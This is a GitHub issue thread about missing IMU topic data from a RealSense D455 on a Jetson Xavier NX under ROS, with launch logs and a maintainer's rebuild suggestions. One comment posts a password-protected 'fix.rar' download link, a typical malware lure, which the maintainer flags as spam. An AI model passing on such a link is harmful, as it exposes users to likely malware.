realsenseai/librealsense #13293: Can't get imu data on D455(Jetson Xavier NX)

kuifanchen, 2024-08-27:
| Required Info                         |                                                                |
|---------------------------------|------------------------------------------- |
| Camera Model                       | D455 | 
| Firmware Version                   | 5.13.0.50 | 
| Operating System & Version | Ubuntu 20.04  | 
| Kernel Version (Linux Only)    | 5.10                         | 
| Platform                                 | Jetson Xavier NX |
| librealsense                                 | 2.50.0 |
| realsense-ros                                 | 2.3.2 |
### Issue Description
After running roslaunch realsense2_camera rs_camers.launch, I can see through rostopic list that topics such as /camera/accel/imu_info, /camera/gyro/imu_info, and /camera/imu exist, but when I check the data, it shows no new messages.
When I close ros and use realsense-viewer, I can see the imu data of gyro and accel normally.
I also tried to Build and Patch Kernel Modules for Jetson L4T, but it shows unsupported jetpack revision 35.5 aborting script.
I have checked many related issues, but to no avail.

amir1387aht, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

MartyG-RealSense, 2024-08-27:
Hi @kuifanchen  Please ignore the above comment about a download and password as it seems to be a spam message.

As you are using L4T 35.5 (JetPack 5.1.3), the IMU should be able to work normally on your Jetson.

Can you confirm please that you have enabled the accel and gyro topics?

`roslaunch realsense2_camera rs_camera.launch enable_accel:=true enable_gyro:=true unite_imu_method:=linear_interpolation`

The patch script **patch-realsense-ubuntu-L4T.sh** supports L4T 35.1 / JetPack 5.0.2 but not 35.5 / JP 5.1.3.  

If you build the librealsense SDK from source code with the **libuvc backend** build script at the link below then the SDK should work with JetPack 5.1.3 and you will not need to apply the patch script.

https://github.com/IntelRealSense/librealsense/blob/master/doc/libuvc_installation.md

kuifanchen, 2024-08-27:
@MartyG-RealSense 
Thanks for your reply. I confirmed that I have modified these parameters in the launch file, and these topics can be displayed using rostopic list.I downloaded librealsense v2.50.0 for compilation

kuifanchen, 2024-08-28:
Thanks!
I tried the method you said, but it doesn't work.

roslaunch realsense2_camera rs_rgbd.launch enable_accel:=true enable_gyro:=true
Checking log directory for disk usage. This may take a while.
Press Ctrl-C to interrupt
Done checking log file disk usage. Usage is <1GB.

started roslaunch server http://ubuntu:43923/

SUMMARY
========

PARAMETERS
 * /camera/color_rectify_color/queue_size: 5
 * /camera/realsense2_camera/accel_fps: -1
 * /camera/realsense2_camera/accel_frame_id: camera_accel_frame
 * /camera/realsense2_camera/accel_optical_frame_id: camera_accel_opti...
 * /camera/realsense2_camera/align_depth: True
 * /camera/realsense2_camera/aligned_depth_to_color_frame_id: camera_aligned_de...
 * /camera/realsense2_camera/aligned_depth_to_fisheye1_frame_id: camera_aligned_de...
 * /camera/realsense2_camera/aligned_depth_to_fisheye2_frame_id: camera_aligned_de...
 * /camera/realsense2_camera/aligned_depth_to_fisheye_frame_id: camera_aligned_de...
 * /camera/realsense2_camera/aligned_depth_to_infra1_frame_id: camera_aligned_de...
 * /camera/realsense2_camera/aligned_depth_to_infra2_frame_id: camera_aligned_de...
 * /camera/realsense2_camera/allow_no_texture_points: False
 * /camera/realsense2_camera/base_frame_id: camera_link
 * /camera/realsense2_camera/calib_odom_file: 
 * /camera/realsense2_camera/clip_distance: -1.0
 * /camera/realsense2_camera/color_fps: -1
 * /camera/realsense2_camera/color_frame_id: camera_color_frame
 * /camera/realsense2_camera/color_height: -1
 * /camera/realsense2_camera/color_optical_frame_id: camera_color_opti...
 * /camera/realsense2_camera/color_width: -1
 * /camera/realsense2_camera/confidence_fps: 30
 * /camera/realsense2_camera/confidence_height: 480
 * /camera/realsense2_camera/confidence_width: 640
 * /camera/realsense2_camera/depth_fps: -1
 * /camera/realsense2_camera/depth_frame_id: camera_depth_frame
 * /camera/realsense2_camera/depth_height: -1
 * /camera/realsense2_camera/depth_optical_frame_id: camera_depth_opti...
 * /camera/realsense2_camera/depth_width: -1
 * /camera/realsense2_camera/device_type: 
 * /camera/realsense2_camera/enable_accel: True
 * /camera/realsense2_camera/enable_color: True
 * /camera/realsense2_camera/enable_confidence: True
 * /camera/realsense2_camera/enable_depth: True
 * /camera/realsense2_camera/enable_fisheye1: False
 * /camera/realsense2_camera/enable_fisheye2: False
 * /camera/realsense2_camera/enable_fisheye: False
 * /camera/realsense2_camera/enable_gyro: True
 * /camera/realsense2_camera/enable_infra1: False
 * /camera/realsense2_camera/enable_infra2: False
 * /camera/realsense2_camera/enable_infra: False
 * /camera/realsense2_camera/enable_pointcloud: False
 * /camera/realsense2_camera/enable_pose: False
 * /camera/realsense2_camera/enable_sync: True
 * /camera/realsense2_camera/filters: 
 * /camera/realsense2_camera/fisheye1_frame_id: camera_fisheye1_f...
 * /camera/realsense2_camera/fisheye1_optical_frame_id: camera_fisheye1_o...
 * /camera/realsense2_camera/fisheye2_frame_id: camera_fisheye2_f...
 * /camera/realsense2_camera/fisheye2_optical_frame_id: camera_fisheye2_o...
 * /camera/realsense2_camera/fisheye_fps: -1
 * /camera/realsense2_camera/fisheye_frame_id: camera_fisheye_frame
 * /camera/realsense2_camera/fisheye_height: -1
 * /camera/realsense2_camera/fisheye_optical_frame_id: camera_fisheye_op...
 * /camera/realsense2_camera/fisheye_width: -1
 * /camera/realsense2_camera/gyro_fps: -1
 * /camera/realsense2_camera/gyro_frame_id: camera_gyro_frame
 * /camera/realsense2_camera/gyro_optical_frame_id: camera_gyro_optic...
[... 123 lines cut ...]
/camera/motion_module/parameter_updates
/camera/realsense2_camera_manager/bond
/camera/rgb_camera/auto_exposure_roi/parameter_descriptions
/camera/rgb_camera/auto_exposure_roi/parameter_updates
/camera/rgb_camera/parameter_descriptions
/camera/rgb_camera/parameter_updates
/camera/stereo_module/auto_exposure_roi/parameter_descriptions
/camera/stereo_module/auto_exposure_roi/parameter_updates
/camera/stereo_module/parameter_descriptions
/camera/stereo_module/parameter_updates
/diagnostics
/rosout
/rosout_agg
/tf
/tf_static

rostopic hz /camera/accel/imu_info
subscribed to [/camera/accel/imu_info]
no new messages
no new messages
no new messages
no new messages
no new messages
no new messages
no new messages

MartyG-RealSense, 2024-08-28:
Does it make a difference if you add **initial_reset:=true** to your roslaunch instruction to reset the camera at launch?

MartyG-RealSense, 2024-08-29:
Which method did you use to compile the librealsense SDK, please?

And are there still no messages if you set the frequency of accel and gyro to their maximums?

` roslaunch realsense2_camera rs_camers.launch accel_fps:=200 gyro_fps:=400`

kuifanchen, 2024-08-30:
@MartyG-RealSense Thanks!
I downloaded librealsense 2.50.0.zip, created a build and compiled it using cmake. cmake ../ -DBUILD_EXAMPLES=true
I tried accel_fps:=200 gyro_fps:=400, still no new messages. 
I also tried using the D435i, same results as the D455.

MartyG-RealSense, 2024-08-30:
Can you try compiling librealsense again with the CMake command below please?

`cmake ../ -DFORCE_RSUSB_BACKEND=true -DCMAKE_BUILD_TYPE=release -DBUILD_EXAMPLES=true -DBUILD_GRAPHICAL_EXAMPLES=true`

kuifanchen, 2024-09-02:
I tried to recompile according to the command you gave. I found that I could get the imu data.
When I thought it was over, I was surprised to find that the imu data disappeared again after roslaunching realsense2_camera. After many attempts, I found that I could only receive imu data when I was lucky.
I then tried using D435i, but it never worked and kept outputting：
[ WARN] [1725265374.225996929]: Hardware Notification:USB CAM overflow,1.72527e+12,Error,Hardware Error
[ WARN] [1725265376.227626884]: Hardware Notification:USB CAM overflow,1.72527e+12,Error,Hardware Error
Now I can only hope that it will be successful when it runs, but I can't guarantee it 100%.

MartyG-RealSense, 2024-09-02:
As the error name suggests, **USB CAM overflow** can indicate a problem in the USB system (the USB port or the USB cable).  The Intel RealSense developer who created the RealSense ROS1 wrapper advises at https://github.com/IntelRealSense/realsense-ros/issues/514#issuecomment-453064671 that "the meaning of the message is that too much data was stuck on the way from camera to computer".

closed 2024-09-16 by MartyG-RealSense